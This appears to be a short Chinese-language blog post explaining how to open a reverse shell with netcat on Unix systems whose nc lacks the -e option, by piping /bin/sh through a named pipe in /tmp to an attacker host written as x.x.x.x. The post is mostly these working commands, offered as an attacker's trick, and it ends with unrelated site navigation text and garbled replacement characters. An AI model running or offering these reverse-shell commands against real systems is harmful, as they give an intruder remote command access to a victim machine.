Unix系統自帶NC,但是為了安全�����,一般不會編譯-e選項���,也就無法反彈shell���。但是可以變換一下思路,不直接使用NC反彈shell���,而是反彈一個擁有shell權限的管道���。
NC的原生做法:
nc -l -vv -p 2222 -e /bin/bash
無法使用NC反彈的時候可以這樣
先在tmp創建一個普通管道
mknod /tmp/backpipe p
或者
mkfifo /tmp/backpipe p
然后管道一邊接入shell,一變用NC反彈到攻擊者主機x.x.x.x
/bin/sh 0</tmp/backpipe | nc x.x.x.x listenport 1>/tmp/backpipe
PS:攻防的對抗一直在思路的轉變之間,將原有思路逆轉�����,可能收獲不一樣的東西��!
公眾號
事業單位
當前位置:
公考類
招聘類
各類考試
